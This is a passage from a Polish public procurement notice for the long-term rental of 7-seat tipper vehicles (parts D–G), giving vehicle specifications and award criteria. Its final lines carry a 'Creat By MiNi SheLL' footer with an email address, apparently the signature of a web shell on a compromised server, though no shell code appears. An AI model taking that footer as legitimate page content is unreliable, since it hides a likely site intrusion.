belka z obustronnym napisem SŁUŻBA DROGOWA zespolona z lampami ostrzegawczymi w kolorze żółtym). Lampa włączana z kabiny pojazdu	tak30	Trójkąt ostrzegawczy, gaśnica proszkowa 2 kg, apteczka, zestaw podstawowych narzędzi (podnośnik i klucz do kół)	tak31	Opcja wymuszania przez użytkownika procesu oczyszczania filtra cząstek stałych (lub inne rozwiązanie pozwalające na oczyszczenie filtra bez ponoszenia dodatkowego kosztu w serwisie, w całym okresie trwania gwarancji mechanicznej pojazdu).	tak32	Opony wielosezonowe (lato/zima)	tak33	Kolor karoserii	zalecany: biały, żółty lub pomarańczowy<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>50111100-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 36<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin przekazania samochodu</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Opłata za 1 km przekroczenia łącznego limitu przebiegu kilometrów</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Przekazanie zarejestrowanych i gotowych do eksploatacji samochodów Zamawiającemu w ramach zadania A,B,C,D,E,F i G – maksymalnie do 30 dni kalendarzowych od dnia podpisania umowy, przy czym przekazanie zarejestrowanych i gotowych do eksploatacji samochodów Zamawiającemu stanowi jedno z kryteriów oceny ofert,wynajem samochodu osobowego – 36 miesięcy od dnia podpisania przez Zamawiającego i Wykonawcę protokołu odbioru pojazdu<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>zadanie D: Długoterminowy najem jednego 7- osobowego samochodu osobowego z zabudową typu wywrotka trójstronna na potrzeby Działu Botaniczno Zoologicznego.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Samochód fabrycznie nowy, nieużywany	min 20192	Nadwozie typu podwójna kabina 7-mio osobowa, homologacja ciężarowa	tak3	Ilość drzwi	44	Pojazd przystosowany do ruchu prawostronnego	tak5	Dopuszczalna masa całkowita max 3500 kg6	Silnik diesla o pojemności min 1950 cm 37	Norma emisji spalin nie niższa niż Euro 6	tak8	Moc silnika min 125 KM9	Napęd na koła przednie lub tylne	tak10	Zużycie paliwa w cyklu mieszanym	max 10l/100 km11	Poduszka powietrzna kierowcy	tak12	Układ ABS ze wspomaganiem awaryjnego hamowania	tak13	Układ kontroli trakcji i stabilizacji toru jazdy	tak14	Klimatyzacja tak15	Centralny zamek z pilotem	tak16	Immobiliser	tak17	Elektrycznie regulowane szyby boczne przednie	tak18	Elektrycznie regulowane i podgrzewane lusterka boczne	tak19	Radio z zestawem głośnomówiącym z Bluetooth	tak20	Dywaniki gumowe	tak21	Koło zapasowe pełnowymiarowe	tak22	Kolumna kierownicy regulowana	tak23	Komputer pokładowy	tak24	Fotel kierowcy z regulacją wysokości tak25	Światła do jazdy dziennej	tak26	Zbiornik paliwa o pojemności	min 50 L27	Wszystkie siedzenia z obiciami / pokrowcami ze skaju	tak28	Gniazdo 12 V w kabinie kierowcy	min 129	Na dachu kabiny zamontowana lampa ostrzegawcza LED (podświetlona belka z obustronnym napisem SŁUŻBA DROGOWA zespolona z lampami ostrzegawczymi w kolorze żółtym). Lampa włączana z kabiny pojazdu	tak30	Trójkąt ostrzegawczy, gaśnica proszkowa 2 kg, apteczka, zestaw podstawowych narzędzi (podnośnik i klucz do kół)	tak31	Hak holowniczy kulowy tak32	Zabudowa - wywrot trójstronny o dł. minimum 2800 mm, szer. minimum 2100 mm, wysokość burt min. 400 mm	tak33	Nadstawki burt demontowalne, z siatki do wysokości dachu kabiny, przykrycie zabudowy plandeką	tak34	Zabudowa zabezpieczona antykorozyjnie	tak35	Opcja wymuszania przez użytkownika procesu oczyszczania filtra cząstek stałych (lub inne rozwiązanie pozwalające na oczyszczenie filtra bez ponoszenia dodatkowego kosztu w serwisie, w całym okresie trwania gwarancji mechanicznej pojazdu).	tak36	Opony wielosezonowe (lato/zima)	tak37	Ładowność po zabudowie	min 800 kg38	Kolor karoserii	zalecany: biały, żółty lub pomarańczowy.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>50111100-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 36<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin przekazania samochodu</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Opłata za 1 km przekroczenia łącznego limitu przebiegu kilometrów</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Przekazanie zarejestrowanych i gotowych do eksploatacji samochodów Zamawiającemu w ramach zadania D – maksymalnie do 30 dni kalendarzowych od dnia podpisania umowy, przy czym przekazanie zarejestrowanych i gotowych do eksploatacji samochodów Zamawiającemu stanowi jedno z kryteriów oceny ofert,	wynajem samochodu osobowego – 36 miesięcy od dnia podpisania przez Zamawiającego i Wykonawcę protokołu odbioru pojazdu.<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>zadanie E: Długoterminowy najem jednego 7- osobowego samochodu osobowego z zabudową typu wywrotka trójstronna na potrzeby Działu Utrzymania Czystości.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Samochód fabrycznie nowy, nieużywany	min 20192	Nadwozie typu podwójna kabina 7-mio osobowa, homologacja ciężarowa	tak3	Ilość drzwi	44	Pojazd przystosowany do ruchu prawostronnego	tak5	Dopuszczalna masa całkowita max 3500 kg6	Silnik diesla o pojemności min 1950 cm 37	Norma emisji spalin nie niższa niż Euro 6	tak8	Moc silnika min 125 KM9	Napęd na koła przednie lub tylne	tak10	Zużycie paliwa w cyklu mieszanym	max 10l/100 km11	Poduszka powietrzna kierowcy	tak12	Układ ABS ze wspomaganiem awaryjnego hamowania	tak13	Układ kontroli trakcji i stabilizacji toru jazdy	tak14	Klimatyzacja tak15	Centralny zamek z pilotem	tak16	Immobiliser	tak17	Elektrycznie regulowane szyby boczne przednie	tak18	Elektrycznie regulowane i podgrzewane lusterka boczne	tak19	Radio z zestawem głośnomówiącym z Bluetooth	tak20	Dywaniki gumowe	tak21	Koło zapasowe pełnowymiarowe	tak22	Kolumna kierownicy regulowana	tak23	Komputer pokładowy	tak24	Fotel kierowcy z regulacją wysokości tak25	Światła do jazdy dziennej	tak26	Zbiornik paliwa o pojemności	min 50 L27	Wszystkie siedzenia z obiciami / pokrowcami ze skaju	tak28	Gniazdo 12 V w kabinie kierowcy	min 129	Na dachu kabiny zamontowana lampa ostrzegawcza LED (podświetlona belka z obustronnym napisem SŁUŻBA DROGOWA zespolona z lampami ostrzegawczymi w kolorze żółtym). Lampa włączana z kabiny pojazdu	tak30	Trójkąt ostrzegawczy, gaśnica proszkowa 2 kg, apteczka, zestaw podstawowych narzędzi (podnośnik i klucz do kół)	tak31	Hak holowniczy kulowy tak32	Zabudowa - wywrot trójstronny o dł. minimum 2800 mm, szer. minimum 2100 mm, wysokość burt min. 400 mm	tak33	Nadstawki burt demontowalne, z siatki do wysokości dachu kabiny, przykrycie zabudowy plandeką	tak34	Zabudowa zabezpieczona antykorozyjnie	tak35	Opcja wymuszania przez użytkownika procesu oczyszczania filtra cząstek stałych (lub inne rozwiązanie pozwalające na oczyszczenie filtra bez ponoszenia dodatkowego kosztu w serwisie, w całym okresie trwania gwarancji mechanicznej pojazdu).	tak36	Opony wielosezonowe (lato/zima)	tak37	Ładowność po zabudowie	min 800 kg38	Kolor karoserii	zalecany: biały, żółty lub pomarańczowy.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>50111100-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 36<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin przekazania samochodu</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Opłata za 1 km przekroczenia łącznego limitu przebiegu kilometrów</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Przekazanie zarejestrowanych i gotowych do eksploatacji samochodów Zamawiającemu w ramach zadania A,B,C,D,E,F i G – maksymalnie do 30 dni kalendarzowych od dnia podpisania umowy, przy czym przekazanie zarejestrowanych i gotowych do eksploatacji samochodów Zamawiającemu stanowi jedno z kryteriów oceny ofert,wynajem samochodu osobowego – 36 miesięcy od dnia podpisania przez Zamawiającego i Wykonawcę protokołu odbioru pojazdu.<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>6</td><td><b>Nazwa: </b></td><td>zadanie F: Długoterminowy najem jednego 7- osobowego samochodu osobowego z zabudową typu wywrotka trójstronna na potrzeby Działu Utrzymania Czystości.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Samochód fabrycznie nowy, nieużywany	min 20192	Nadwozie typu podwójna kabina 7-mio osobowa, homologacja ciężarowa	tak3	Ilość drzwi	44	Pojazd przystosowany do ruchu prawostronnego	tak5	Dopuszczalna masa całkowita max 3500 kg6	Silnik diesla o pojemności min 1950 cm 37	Norma emisji spalin nie niższa niż Euro 6	tak8	Moc silnika min 125 KM9	Napęd na koła przednie lub tylne	tak10	Zużycie paliwa w cyklu mieszanym	max 10l/100 km11	Poduszka powietrzna kierowcy	tak12	Układ ABS ze wspomaganiem awaryjnego hamowania	tak13	Układ kontroli trakcji i stabilizacji toru jazdy	tak14	Klimatyzacja tak15	Centralny zamek z pilotem	tak16	Immobiliser	tak17	Elektrycznie regulowane szyby boczne przednie	tak18	Elektrycznie regulowane i podgrzewane lusterka boczne	tak19	Radio z zestawem głośnomówiącym z Bluetooth	tak20	Dywaniki gumowe	tak21	Koło zapasowe pełnowymiarowe	tak22	Kolumna kierownicy regulowana	tak23	Komputer pokładowy	tak24	Fotel kierowcy z regulacją wysokości tak25	Światła do jazdy dziennej	tak26	Zbiornik paliwa o pojemności	min 50 L27	Wszystkie siedzenia z obiciami / pokrowcami ze skaju	tak28	Gniazdo 12 V w kabinie kierowcy	min 129	Na dachu kabiny zamontowana lampa ostrzegawcza LED (podświetlona belka z obustronnym napisem SŁUŻBA DROGOWA zespolona z lampami ostrzegawczymi w kolorze żółtym). Lampa włączana z kabiny pojazdu	tak30	Trójkąt ostrzegawczy, gaśnica proszkowa 2 kg, apteczka, zestaw podstawowych narzędzi (podnośnik i klucz do kół)	tak31	Hak holowniczy kulowy tak32	Zabudowa - wywrot trójstronny o dł. minimum 2800 mm, szer. minimum 2100 mm, wysokość burt min. 400 mm	tak33	Nadstawki burt demontowalne, z siatki do wysokości dachu kabiny, przykrycie zabudowy plandeką	tak34	Zabudowa zabezpieczona antykorozyjnie	tak35	Opcja wymuszania przez użytkownika procesu oczyszczania filtra cząstek stałych (lub inne rozwiązanie pozwalające na oczyszczenie filtra bez ponoszenia dodatkowego kosztu w serwisie, w całym okresie trwania gwarancji mechanicznej pojazdu).	tak36	Opony wielosezonowe (lato/zima)	tak37	Ładowność po zabudowie	min 800 kg38	Kolor karoserii	zalecany: biały, żółty lub pomarańczowy.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>50111100-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 36<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin przekazania samochodu</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Opłata za 1 km przekroczenia łącznego limitu przebiegu kilometrów</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Przekazanie zarejestrowanych i gotowych do eksploatacji samochodów Zamawiającemu w ramach zadania F – maksymalnie do 30 dni kalendarzowych od dnia podpisania umowy, przy czym przekazanie zarejestrowanych i gotowych do eksploatacji samochodów Zamawiającemu stanowi jedno z kryteriów oceny ofert,	wynajem samochodu osobowego – 36 miesięcy od dnia podpisania przez Zamawiającego i Wykonawcę protokołu odbioru pojazdu.<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>7</td><td><b>Nazwa: </b></td><td>zadnia G: Długoterminowy najem jednego 7- osobowego samochodu osobowego z zabudową typu wywrotka trójstronna na potrzeby Działu Utrzymania Czystości.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Samochód fabrycznie nowy, nieużywany	min 20192	Nadwozie typu podwójna kabina 7-mio osobowa, homologacja ciężarowa	tak3	Ilość drzwi	44	Pojazd przystosowany do ruchu prawostronnego	tak5	Dopuszczalna masa całkowita max 3500 kg6	Silnik diesla o pojemności min 1950 cm 37	Norma emisji spalin nie niższa niż Euro 6	tak8	Moc silnika min 125 KM9	Napęd na koła przednie lub tylne	tak10	Zużycie paliwa w cyklu mieszanym	max 10l/100 km11	Poduszka powietrzna kierowcy	tak12	Układ ABS ze wspomaganiem awaryjnego hamowania	tak13	Układ kontroli trakcji i stabilizacji toru jazdy	tak14	Klimatyzacja tak15	Centralny zamek z pilotem	tak16	Immobiliser	tak17	Elektrycznie regulowane szyby boczne przednie	tak18	Elektrycznie regulowane i podgrzewane lusterka boczne	tak19	Radio z zestawem głośnomówiącym z Bluetooth	tak20	Dywaniki gumowe	tak21	Koło zapasowe pełnowymiarowe	tak22	Kolumna kierownicy regulowana	tak23	Komputer pokładowy	tak24	Fotel kierowcy z regulacją wysokości tak25	Światła do jazdy dziennej	tak26	Zbiornik paliwa o pojemności	min 50 L27	Wszystkie siedzenia z obiciami / pokrowcami ze skaju	tak28	Gniazdo 12 V w kabinie kierowcy	min 129	Na dachu kabiny zamontowana lampa ostrzegawcza LED (podświetlona belka z obustronnym napisem SŁUŻBA DROGOWA zespolona z lampami ostrzegawczymi w kolorze żółtym). Lampa włączana z kabiny pojazdu	tak30	Trójkąt ostrzegawczy, gaśnica proszkowa 2 kg, apteczka, zestaw podstawowych narzędzi (podnośnik i klucz do kół)	tak31	Hak holowniczy kulowy tak32	Zabudowa - wywrot trójstronny o dł. minimum 2800 mm, szer. minimum 2100 mm, wysokość burt min. 400 mm	tak33	Nadstawki burt demontowalne, z siatki do wysokości dachu kabiny, przykrycie zabudowy plandeką	tak34	Zabudowa zabezpieczona antykorozyjnie	tak35	Opcja wymuszania przez użytkownika procesu oczyszczania filtra cząstek stałych (lub inne rozwiązanie pozwalające na oczyszczenie filtra bez ponoszenia dodatkowego kosztu w serwisie, w całym okresie trwania gwarancji mechanicznej pojazdu).	tak36	Opony wielosezonowe (lato/zima)	tak37	Ładowność po zabudowie	min 800 kg38	Kolor karoserii	zalecany: biały, żółty lub pomarańczowy.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>50111100-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 36<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin przekazania samochodu</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Opłata za 1 km przekroczenia łącznego limitu przebiegu kilometrów</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Przekazanie zarejestrowanych i gotowych do eksploatacji samochodów Zamawiającemu w ramach zadania G – maksymalnie do 30 dni kalendarzowych od dnia podpisania umowy, przy czym przekazanie zarejestrowanych i gotowych do eksploatacji samochodów Zamawiającemu stanowi jedno z kryteriów oceny ofert,	wynajem samochodu osobowego – 36 miesięcy od dnia podpisania przez Zamawiającego i Wykonawcę protokołu odbioru pojazdu.<br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com